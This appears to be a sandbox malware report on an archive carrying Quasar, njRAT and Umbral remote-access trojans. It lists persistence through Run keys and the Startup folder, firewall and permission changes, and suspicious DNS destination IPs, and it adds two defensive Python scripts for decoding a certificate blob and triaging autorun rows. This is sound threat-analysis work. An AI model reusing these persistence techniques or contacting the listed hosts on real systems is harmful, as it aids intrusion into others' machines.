Analysis Overview
SHA256
de59c7b1cef753487469ad372c2dbebfa31043fc403aceeadbb24cab42e79889
Threat Level: Known bad
The file 240927-mh3m1sxgrm_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
Quasar family
njRAT/Bladabindi
Umbral
Quasar payload
Umbral family
Quasar RAT
UAC bypass
Njrat family
Detect Umbral payload
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
Possible privilege escalation attempt
Drops file in Drivers directory
Manipulates Digital Signatures
Blocklisted process makes network request
.NET Reactor protector
Unexpected DNS network traffic destination
Drops startup file
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Event Triggered Execution: Component Object Model Hijacking
Modifies file permissions
Password Policy Discovery
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Obfuscated Files or Information: Command Obfuscation
Adds Run key to start application
Looks up external IP address via web service
Sets desktop wallpaper using registry
UPX packed file
Suspicious use of SetThreadContext
AutoIT Executable
Enumerates processes with tasklist
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
HTTP links in PDF interactive object
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
System Location Discovery: System Language Discovery
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Program crash
NSIS installer
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Kills process with taskkill
Runs net.exe
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Runs regedit.exe
Delays execution with timeout.exe
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Suspicious behavior: AddClipboardFormatListener
NTFS ADS
Modifies Internet Explorer settings
Modifies registry class
Enumerates system info in registry
Scheduled Task/Job: Scheduled Task
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies data under HKEY_USERS
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Gathers network information
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-08 09:18
Signatures
Detect Umbral payload
(1 match; no indicator details recorded)
Njrat family
Quasar family
Quasar payload
(1 match; no indicator details recorded)
Umbral family
AutoIT Executable
(1 match; no indicator details recorded)
HTTP links in PDF interactive object
(1 match; no indicator details recorded)
Unsigned PE
(1 match; no indicator details recorded)
NSIS installer
(1 match; no indicator details recorded)
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 09:16
Reported
2024-11-08 09:21
Platform
win7-20241023-en
Max time kernel
150s
Max time network
164s
Command Line
Signatures
Detect Umbral payload
(2 matches; no indicator details recorded)
Njrat family
Quasar RAT
Quasar family
Quasar payload
(11 matches; no indicator details recorded)
Umbral
Umbral family
njRAT/Bladabindi
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\DRIVERS\SETE8D9.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETE8D9.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\droidcam.sys | C:\Windows\system32\DrvInst.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = (elided) | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = (elided) | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = 0f00000001000000140000005499b4f34c6397ce83670cd84156bdc761f906b3030000000100000014000000430e77033e527f42dc67bc6984d33d889a73f0cd200000000100000000030000308202fc308201e4a003020102021033edcc7a9050638b4ebed4f8f15b4a5b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313835385a180f32313234313031353039313835385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b82e6da8da56e44fb30c49a7bdc482bb9dca611d387f58526b4a0e5e0b800bf7aa47905e92ed1a6d124b929819391bad86059acb1771958341ec9d69e0747cc883709c117047778f4365d4f71b5645dfcc2430aab7b07a67af0bd67d382a98ac927f8410e76a7be57a9ed6a6e08c2604649c6a574c2c64fd4569f2b5d041985135c0c692a7f911205cfb5e5188cc5e4fa09ddb37caad8a808c6b735c929e705ec2201e91891eb72408769fd1949b24c53b87793cfbf1ece50b76b992723162930f19c81fa1ad81e6410813d3681e1d1f4768fceee7f035271ce4169150fae829aaf6b3f329b4753c9b33011326c1482c64a3aab54563fbafebc8c8e20dcffe790203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40504a4353444d52500030090603551d1304023000300d06092a864886f70d010105050003820101002b95f3244ef7172719b16e2c504a129ce40aa3eed42d8163b6387400c94562ee63249ca00e1cd91d6e3e5236941dd7fc1eea25e448201badc4186432fef63809b581790577b12dcfb0b167670a3d96cf55231fcb8c827f874e3e835bee7b68bffc8b9ebe67c9641746a8fce97480f40fd2ce8e7c26334f59a4d17c1e5822995877545d531fcac5a65e2b47ddee843edc79e0537e1cfdb0c35985912d82a67adf3ab01eb48bc64a69c9bcef6b9c42757e5aaf09c71f14f32c6205ee69753f7b70082ae0fdd3ebf152afce8f1977620b26a8946a4aaac5afb2ad1f5aedf6e2b80be614ce2f660dedbad3494c938771fbbcaf6daaa7f5c769f6a2db5a814d40c50b | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
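The Blob value in the HKLM row is CryptoAPI's serialized certificate context rather than a bare certificate: a run of property records (u32 property id, u32 reserved, u32 length, data) in which property 3 carries the SHA-1 thumbprint that names the registry key and property 32 carries the DER-encoded certificate. The decoder below is an added example written for this page, not sandbox output or tooling from the report; it embeds the blob and key name copied from the row above, uses only the Python standard library, takes the property-id names from wincrypt.h, and assumes the second u32 of each record can be ignored (it is 1 throughout this blob).

```python
import hashlib
import struct

CERT_SHA1_HASH_PROP_ID, CERT_SIGNATURE_HASH_PROP_ID, CERT_CERT_PROP_ID = 3, 15, 32  # wincrypt.h
# Registry key name (the thumbprint) and Blob data, copied from the HKLM TrustedPeople row above
KEY_NAME = "430E77033E527F42DC67BC6984D33D889A73F0CD"
BLOB_HEX = (
    "0f00000001000000140000005499b4f34c6397ce83670cd84156bdc761f906b3030000000100000014000000430e77033e527f42dc67bc6984d33d889a73f0cd"
    "200000000100000000030000308202fc308201e4a003020102021033edcc7a9050638b4ebed4f8f15b4a5b300d06092a864886f70d0101050500"
    "3010310e300c0603550403130541646d696e3020170d3234313130383039313835385a180f32313234313031353039313835385a3010310e300c0603550403130541646d696e"
    "30820122300d06092a864886f70d01010105000382010f003082010a0282010100b82e6da8da56e44fb30c49a7bdc482bb9dca611d387f58526b4a0e5e0b800bf7aa47905e92ed1a6d124b929819391bad86059acb1771958341ec9d69e0747cc8"
    "83709c117047778f4365d4f71b5645dfcc2430aab7b07a67af0bd67d382a98ac927f8410e76a7be57a9ed6a6e08c2604649c6a574c2c64fd4569f2b5d0419851"
    "35c0c692a7f911205cfb5e5188cc5e4fa09ddb37caad8a808c6b735c929e705ec2201e91891eb72408769fd1949b24c53b87793cfbf1ece50b76b99272316293"
    "0f19c81fa1ad81e6410813d3681e1d1f4768fceee7f035271ce4169150fae829aaf6b3f329b4753c9b33011326c1482c64a3aab54563fbafebc8c8e20dcffe79"
    "0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40504a4353444d525000"
    "30090603551d1304023000300d06092a864886f70d010105050003820101002b95f3244ef7172719b16e2c504a129ce40aa3eed42d8163b6387400c94562ee"
    "63249ca00e1cd91d6e3e5236941dd7fc1eea25e448201badc4186432fef63809b581790577b12dcfb0b167670a3d96cf55231fcb8c827f874e3e835bee7b68bf"
    "fc8b9ebe67c9641746a8fce97480f40fd2ce8e7c26334f59a4d17c1e5822995877545d531fcac5a65e2b47ddee843edc79e0537e1cfdb0c35985912d82a67adf"
    "3ab01eb48bc64a69c9bcef6b9c42757e5aaf09c71f14f32c6205ee69753f7b70082ae0fdd3ebf152afce8f1977620b26a8946a4aaac5afb2ad1f5aedf6e2b80b"
    "e614ce2f660dedbad3494c938771fbbcaf6daaa7f5c769f6a2db5a814d40c50b"
)
OID_NAMES = {"2.5.4.3": "CN", "1.3.6.1.4.1.311.10.3.4": "Microsoft EFS", "1.3.6.1.4.1.311.20.2.3": "UPN"}

def parse_blob(blob):
    # record layout: <u32 property id><u32 reserved, 1 in this blob><u32 length><data>
    props, off = {}, 0
    while off + 12 <= len(blob):
        prop_id, _reserved, length = struct.unpack_from("<III", blob, off)
        props[prop_id] = blob[off + 12:off + 12 + length]
        off += 12 + length
    return props

def der_tlv(buf, off):
    # one DER tag-length-value at buf[off] -> (tag, value, offset of the next element)
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes that follow
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, buf[off:off + length], off + length

def der_children(value):
    # every TLV directly inside a constructed value, as (tag, value) pairs
    out, off = [], 0
    while off < len(value):
        tag, val, off = der_tlv(value, off)
        out.append((tag, val))
    return out

def decode_oid(raw):
    arcs, n = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        n = (n << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(n)
            n = 0
    oid = ".".join(map(str, arcs))
    return OID_NAMES.get(oid, oid)  # dotted OID, or a friendly name when we know one

def decode_name(value):
    # X.501 Name -> {'CN': 'Admin'}; the values here are PrintableString, so latin-1 is safe
    return {decode_oid(atv[0][1]): atv[1][1].decode("latin-1") for _, rdn in der_children(value)
            for _, a in der_children(rdn) for atv in [der_children(a)]}

def decode_time(tag, raw):
    # UTCTime (0x17, YYMMDD...) or GeneralizedTime (0x18, YYYYMMDD...) -> 'YYYY-MM-DD HH:MM:SSZ'
    s = raw.decode("ascii")
    if tag == 0x17:
        s = ("19" if int(s[:2]) >= 50 else "20") + s  # RFC 5280 two-digit year rule
    return f"{s[:4]}-{s[4:6]}-{s[6:8]} {s[8:10]}:{s[10:12]}:{s[12:14]}Z"

def summarize_certificate(der):
    # Certificate -> tbsCertificate; pull the fields that matter for triage
    fields = der_children(der_children(der_tlv(der, 0)[1])[0][1])
    i = 1 if fields[0][0] == 0xA0 else 0  # skip the explicit [0] version when present
    (nb_tag, nb), (na_tag, na) = der_children(fields[i + 3][1])
    info = {"serial": fields[i][1].hex(), "issuer": decode_name(fields[i + 2][1]),
            "not_before": decode_time(nb_tag, nb), "not_after": decode_time(na_tag, na),
            "subject": decode_name(fields[i + 4][1]), "eku": [], "upn": None}
    for exts in [v for t, v in fields[i + 6:] if t == 0xA3]:  # [3] EXPLICIT Extensions
        for _, ext in der_children(der_children(exts)[0][1]):
            items = der_children(ext)  # OID, optional critical BOOLEAN, OCTET STRING
            oid, inner = decode_oid(items[0][1]), der_children(items[-1][1])[0][1]
            if oid == "2.5.29.37":  # extendedKeyUsage: SEQUENCE OF OID
                info["eku"] = [decode_oid(o) for _, o in der_children(inner)]
            elif oid == "2.5.29.17":  # subjectAltName: pick out the Microsoft UPN otherName
                for gn_tag, gn in der_children(inner):
                    if gn_tag == 0xA0 and decode_oid(der_children(gn)[0][1]) == "UPN":
                        upn = der_children(der_children(gn)[1][1])[0][1]
                        info["upn"] = upn.decode("utf-8").rstrip("\x00")
    return info

def analyse_blob(blob_hex=BLOB_HEX, key_name=KEY_NAME):
    # decode the Blob and cross-check the stored thumbprint against the key name and the DER
    props = parse_blob(bytes.fromhex(blob_hex))
    der, stored = props[CERT_CERT_PROP_ID], props[CERT_SHA1_HASH_PROP_ID].hex()
    info = summarize_certificate(der)
    info.update(property_ids=sorted(props), der_length=len(der), stored_sha1=stored,
                key_name_matches_stored_sha1=stored == key_name.lower(),
                der_sha1_matches_stored=hashlib.sha1(der).hexdigest() == stored,
                self_signed=info["subject"] == info["issuer"])
    return info
```

Decoded, the certificate is self-signed (subject and issuer are both CN=Admin), its validity starts at 2024-11-08 09:18:58Z, inside this detonation's submitted-to-reported window, its only extended key usage is Microsoft EFS (1.3.6.1.4.1.311.10.3.4) and its subject alternative name is the UPN Admin@PJCSDMRP. With cipher.exe appearing several times in the System Language Discovery table further down, this reads as an EFS user certificate generated during the run rather than a code-signing certificate, so treat the signature name as a prompt to decode the blob, not as evidence on its own that signing trust was altered. The script also recomputes SHA-1 over the DER and reports whether it matches the stored thumbprint, which is the first check to run on any TrustedPeople or Root entry a sample writes.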
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
.NET Reactor protector
(35 matches; no indicator details recorded)
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 185.93.182.46 | N/A | N/A |
| Destination IP | 74.208.156.127 | N/A | N/A |
| Destination IP | 5.157.51.190 | N/A | N/A |
| Destination IP | 172.105.221.253 | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
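The two Run values and the Startup-folder drop share the same 32-hex-character name, and the Run command line carries a trailing `..` argument. The script below, an added example and not part of the report, takes rows constructed from the Drops startup file, Adds Run key and Unexpected DNS network traffic destination tables on this page, splits each registry indicator into hive, key and value name, unescapes the sandbox's C-style quoting to recover the image path and its arguments, and links the Startup-folder file to the Run value sharing its name; the row layout, field names and regular expressions are the editor's.

```python
import re

# Rows constructed from the "Drops startup file", "Adds Run key" and "Unexpected DNS network
# traffic destination" tables above, as (description, indicator, process); paths copied verbatim.
ROWS = [
    ("File created",
     r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe",
     r"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"),
    ("Set value (str)",
     r'\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .."',
     r"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"),
    ("Set value (str)",
     r'\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .."',
     r"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"),
    ("Destination IP", "185.93.182.46", None),
    ("Destination IP", "74.208.156.127", None),
    ("Destination IP", "5.157.51.190", None),
    ("Destination IP", "172.105.221.253", None),
]

# \REGISTRY\<hive>\...\CurrentVersion\Run\<value name> = "<escaped data>", as the sandbox prints it
RUN_VALUE = re.compile(
    r'^\\REGISTRY\\(?P<hive>USER\\S-[\d-]+|MACHINE)\\(?P<key>.*?\\CurrentVersion\\Run)\\(?P<name>[^\\]+) = "(?P<data>.*)"$')


def parse_run_value(indicator):
    """Hive, key, value name, and the unescaped command line split into image path and arguments."""
    m = RUN_VALUE.match(indicator)
    if not m:
        return None
    cmd = m["data"].replace('\\"', '"').replace("\\\\", "\\")  # undo the sandbox's C-style escaping
    img = re.match(r'^"([^"]+)"\s*(.*)$', cmd) or re.match(r"^(\S+)\s*(.*)$", cmd)
    return {"hive": "HKCU" if m["hive"].startswith("USER") else "HKLM",
            "wow64": "\\Wow6432Node\\" in m["key"], "value_name": m["name"],
            "image": img[1], "args": img[2]}


def triage(rows):
    """Collect autoruns, Startup-folder drops and DNS destinations and link them together."""
    autoruns, startup_files, dns = [], [], []
    for desc, indicator, process in rows:
        run = parse_run_value(indicator) if desc.startswith("Set value") else None
        if run:
            run.update(writer=process, image_in_user_temp="\\AppData\\Local\\Temp\\" in run["image"])
            autoruns.append(run)
        elif "\\Start Menu\\Programs\\Startup\\" in indicator:
            startup_files.append({"file": indicator.rsplit("\\", 1)[1], "writer": process})
        elif desc == "Destination IP":
            dns.append(indicator)
    run_names = {a["value_name"] for a in autoruns}
    linked = [f["file"] for f in startup_files if f["file"].rsplit(".", 1)[0] in run_names]
    # an HKLM Run write from an image living in the user's Temp directory implies an elevated token
    elevated = any(a["hive"] == "HKLM" and "\\AppData\\Local\\Temp\\" in (a["writer"] or "")
                   for a in autoruns)
    return {"autoruns": autoruns, "startup_files": startup_files, "dns_destinations": dns,
            "startup_files_named_like_run_values": linked,
            "hklm_run_written_from_user_temp": elevated}
```

Both Run values resolve to the same image in the user's Temp directory, written by that image itself; the HKLM\SOFTWARE\Wow6432Node\...\Run write needs an elevated token, which is the same privilege question the UAC bypass and Checks whether UAC is enabled tags raise. A Run value of the form "<path>" .. is the persistence shape long associated with njRAT/Bladabindi, consistent with the family tags at the top of the report, and the four DNS destinations come out as a ready-made block list for the resolver or firewall.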
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SysWOW64\cmd.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Password Policy Discovery
AutoIT Executable
(3 matches; no indicator details recorded)
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infstrng.dat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infpub.dat | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infstor.dat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infpub.dat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infstrng.dat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infpub.dat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\INFCACHE.0 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infstrng.dat | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF | C:\Windows\system32\DrvInst.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" | C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\CLWCP.exe | N/A |
UPX packed file
(7 matches; no indicator details recorded)
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.app.log | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\INF\oem2.PNF | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev2 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| File created | C:\Windows\INF\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\setupact.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\setuperr.log | C:\Windows\system32\DrvInst.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\notepad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
